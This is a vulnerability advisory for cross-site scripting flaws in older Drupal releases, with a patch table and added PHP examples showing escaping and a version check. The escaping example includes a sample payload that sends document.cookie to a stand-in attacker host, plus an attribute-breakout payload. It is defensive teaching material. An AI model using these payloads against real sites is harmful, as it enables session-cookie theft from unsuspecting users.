Drupal Multiple Cross-Site Scripting Vulnerabilities
BID:25097
Info
| Bugtraq ID: | 25097 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2007 12:00AM |
| Updated: | Jul 31 2007 12:25AM |
| Credit: | David Caylor and Karthik are credited with the discovery of these vulnerabilities. |
| Vulnerable: | Drupal 5.1 revision 1.1, 5.1, 5.0; Drupal 4.7.6, 4.7.5, 4.7.4, 4.7.3, 4.7.2, 4.7.1, 4.7 |
| Not Vulnerable: | Drupal 5.2; Drupal 4.7.7 |
Discussion
Drupal is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Drupal 4.7.x releases prior to 4.7.7 and Drupal 5.x releases prior to 5.2 are vulnerable to these issues.
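The bug class the advisory describes, as an added example that is not Drupal's own code: a page-building function that inserts a user-supplied value into HTML without escaping, beside the hardened form that escapes at the point of output. check_plain() is the Drupal 4.7/5.x API function for text placed into HTML; the stand-in defined here is assumed to behave like it (htmlspecialchars with ENT_QUOTES and UTF-8) so the script runs without a Drupal install. The render functions, the "title" field and the payloads are constructed for illustration and are not the specific inputs reported for this BID.

```php
<?php
// Added example, not Drupal's own code. Shows unescaped output beside the
// hardened form. check_plain() exists in Drupal 4.7/5.x; this stand-in is
// assumed to match it so the script runs stand-alone.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Vulnerable: $title (hypothetical form field) is interpolated raw into both
// an attribute and element content, so a value containing <script> or a
// stray double quote becomes live markup for every visitor.
function render_title_vulnerable($title) {
  return '<h2 class="title" title="' . $title . '">' . $title . '</h2>';
}

// Hardened: escape where the text enters HTML. ENT_QUOTES matters because
// the same value also lands in an attribute, where one quote is enough to
// break out and add an event handler.
function render_title_hardened($title) {
  $safe = check_plain($title);
  return '<h2 class="title" title="' . $safe . '">' . $safe . '</h2>';
}

// Escaping alone does not make an attacker-controlled URL safe: a
// javascript: scheme passes through htmlspecialchars untouched. Allow only
// the schemes the site needs (plus site-relative paths, but not
// protocol-relative //host paths) and then escape. Drupal's own helper for
// this is check_url(); this is a simplified stand-in, not its implementation.
function render_link_hardened($href, $text) {
  if (!preg_match('#^(?:(?:https?|ftp|mailto):|/(?!/))#i', $href)) {
    $href = '/';
  }
  return '<a href="' . check_plain($href) . '">' . check_plain($text) . '</a>';
}

// Constructed payloads of the kind submitted to any field that is later
// echoed: a cookie-stealing script tag and an attribute breakout.
$titles = array(
  '<script>document.location="http://attacker.example/?c=" + document.cookie</script>',
  '" onmouseover="alert(document.cookie)',
);

foreach ($titles as $t) {
  echo "vulnerable: " . render_title_vulnerable($t) . "\n";
  echo "hardened:   " . render_title_hardened($t) . "\n\n";
}
echo render_link_hardened('javascript:alert(document.cookie)', 'read more') . "\n";
echo render_link_hardened('http://drupal.org/', 'Drupal <b>home</b>') . "\n";
```

Run it with `php example.php`. In the vulnerable lines the payloads appear verbatim, so a browser would execute them; in the hardened lines `<` becomes `&lt;` and `"` becomes `&quot;`, and the `javascript:` link is replaced by a safe relative target. The point to carry over to a real codebase is that the escaping must happen in every output path, which is why a single missed path produces an advisory like this one.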
Exploit / POC
Attackers can exploit these issues by tricking a user into following a crafted link or visiting a malicious site that targets the affected Drupal installation.
Solution / Fix
Solution:
The vendor has released Drupal 4.7.7 and Drupal 5.2 to address these issues. Please see the references for more information.
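A way to confirm that an installation is on a fixed release, as an added example that is not Drupal's own code: it reads the VERSION constant out of system.module and compares it against 4.7.7 or 5.2 depending on the branch. It assumes the constant is defined as `define('VERSION', 'x.y.z');` in `modules/system.module` (4.7) or `modules/system/system.module` (5.x), as in those releases; the fixture it builds in a temporary directory is constructed so the script runs without a real site.

```php
<?php
// Added example, not Drupal's own code. Reports whether a Drupal tree is at
// or above the release that fixes BID 25097: 4.7.7 on the 4.7 branch, 5.2 on
// the 5.x branch. Assumes VERSION is defined in system.module at one of the
// two paths below, as in these releases.

define('FIXED_4_7', '4.7.7');
define('FIXED_5',   '5.2');

// Pull the VERSION constant out of system.module source text.
// Returns null when the constant is not present.
function drupal_version_from_source($source) {
  if (preg_match("/define\\('VERSION',\\s*'([0-9][0-9A-Za-z.\\-]*)'\\)/", $source, $m)) {
    return $m[1];
  }
  return null;
}

// true  => at or above the fixed version for its branch
// false => on an affected branch and below the fix
// null  => a branch this advisory does not cover
function fixed_for_bid_25097($version) {
  if (preg_match('/^4\.7(\.|$)/', $version)) {
    return version_compare($version, FIXED_4_7, '>=');
  }
  if (preg_match('/^5\./', $version)) {
    return version_compare($version, FIXED_5, '>=');
  }
  return null;
}

// Look in the 5.x and 4.7 locations under a Drupal root and classify it.
function check_drupal_root($root) {
  $candidates = array('modules/system/system.module', 'modules/system.module');
  foreach ($candidates as $rel) {
    $path = rtrim($root, '/') . '/' . $rel;
    if (!is_file($path)) {
      continue;
    }
    $version = drupal_version_from_source(file_get_contents($path));
    if ($version === null) {
      return array('path' => $path, 'version' => null, 'status' => 'unknown');
    }
    $fixed = fixed_for_bid_25097($version);
    $status = ($fixed === null) ? 'not covered' : ($fixed ? 'fixed' : 'VULNERABLE');
    return array('path' => $path, 'version' => $version, 'status' => $status);
  }
  return array('path' => null, 'version' => null, 'status' => 'system.module not found');
}

// Constructed fixture: a throwaway tree with a Drupal 5.1-style system.module.
// Point check_drupal_root() at a real document root to check an installation.
$root = sys_get_temp_dir() . '/drupal-check-' . getmypid();
mkdir($root . '/modules/system', 0700, true);
file_put_contents($root . '/modules/system/system.module',
  "<?php\n/**\n * The current system version.\n */\ndefine('VERSION', '5.1');\n");

$result = check_drupal_root($root);
printf("%s: VERSION %s => %s\n", $result['path'], $result['version'], $result['status']);

// Remove the fixture.
unlink($root . '/modules/system/system.module');
rmdir($root . '/modules/system');
rmdir($root . '/modules');
rmdir($root);
```

The branch test comes first because version_compare() alone would call 4.7.7 "below" 5.0 and report a patched 4.7 site as vulnerable. A site that reports "fixed" still needs its contributed modules reviewed separately; this check covers core only.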
| Affected version | Fix |
| Drupal 5.0, 5.1 | drupal-5.2.tar.gz: http://ftp.drupal.org/pub/drupal/files/projects/drupal-5.2.tar.gz |
| Drupal 4.7, 4.7.1, 4.7.2, 4.7.3, 4.7.4, 4.7.5, 4.7.6 | drupal-4.7.7.tar.gz: http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz |
References
References: